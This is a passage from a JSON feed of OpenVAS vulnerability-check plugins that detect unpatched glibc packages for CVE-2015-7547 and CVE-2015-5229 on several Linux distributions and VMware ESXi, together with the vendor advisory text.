7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0176-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-February/msg00033.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", 
rpm:\"nscd~2.17~106.el7_2.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310882399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882399", "type": "openvas", "title": "CentOS Update for glibc CESA-2016:0176 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2016:0176 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882399\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:27:38 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for glibc CESA-2016:0176 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the name service cache daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. 
This could result in unexpected\napplication behavior such as hangs or crashes. (CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and Red\nHat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs:\n\n * The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the operating\nsystem as quickly as possible. This can result in performance degradation\nwhen the rate of free calls is very high. The first memory pool (the main\npool) does provide a method to rate limit the returns via M_TRIM_THRESHOLD,\nbut this method is not available to subsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to all\nmemory pools, which improves performance for threads with very high amounts\nof free calls and limits the number of 'madvise' system calls. The change\nalso increases the total transient memory usage by processes because the\ntrim threshold must be reached before memory can be freed.\n\nTo return to the previous behavior, you can either set M_TRIM_THRESHOLD\nusing the 'mallopt' function, or set the MALLOC_TRIM_THRESHOLD environment\nvariable to 0. (BZ#1298930)\n\n * On the little-endian variant of 64-bit IBM Power Systems (ppc64le), a bug\nin the dynamic loader could cause applications compiled with profiling\nenabled to fail to start with the error 'monstartup: out of memory'.\nThe bug has been corrected and applications compiled for profiling now\nstart correctly. 
(BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0176\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-February/021672.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.el7_2.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:58:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-03-11T00:00:00", "id": "OPENVAS:1361412562310120650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120650", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-660)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120650\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-11 07:09:13 +0200 (Fri, 11 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-660)\");\n script_tag(name:\"insight\", value:\"It was discovered that the calloc implementation in glibc could return memory areas which contain non-zero bytes. This could result in unexpected application behavior such as hangs or crashes.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-660.html\");\n script_cve_id(\"CVE-2015-5229\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo\", 
rpm:\"glibc-debuginfo~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~106.167.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "Oracle Linux Local Security Checks ELSA-2016-0175", "modified": "2019-03-14T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310122881", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122881", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0175.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# 
Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122881\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 07:27:22 +0200 (Thu, 18 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0175\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0175 - glibc security and bug fix update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0175\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0175.html\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", 
rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing an update for the 'glibc' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2016-02-18T00:00:00", "id": "OPENVAS:1361412562310807299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807299", "type": "openvas", "title": "Fedora Update for glibc FEDORA-2016-0", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807299\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-18 06:22:33 +0100 (Thu, 18 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for glibc FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/177412.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.22~9.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310882391", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882391", "type": "openvas", "title": "CentOS Update for glibc CESA-2016:0175 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2016:0175 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882391\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:26:54 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for glibc CESA-2016:0175 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the Name Server Caching Daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. 
(CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n * The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with 'dlopen: cannot load any more object with static TLS'\nshould now start up correctly. (BZ#1291270)\n\n * A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. 
(BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0175\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-February/021668.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-19T16:04:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "VMware product updates address a critical glibc security vulnerability.", "modified": "2019-12-18T00:00:00", "published": "2016-02-24T00:00:00", "id": "OPENVAS:1361412562310105560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105560", "type": "openvas", "title": "VMware ESXi updates address a critical glibc security vulnerability (VMSA-2016-0002)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0002: VMware product updates address a critical glibc security vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105560\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi updates address a critical glibc security vulnerability (VMSA-2016-0002)\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0002.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"insight\", value:\"The glibc library has been updated in multiple products to resolve a\n stack buffer overflow present in the glibc getaddrinfo function.\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"VMware product updates address a critical glibc security vulnerability.\");\n\n script_tag(name:\"affected\", value:\"ESXi 6.0 without patch ESXi600-201602401-SG\n\n ESXi 5.5 without patch ESXi550-201602401-SG\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-24 15:23:40 +0100 (Wed, 24 Feb 2016)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n 
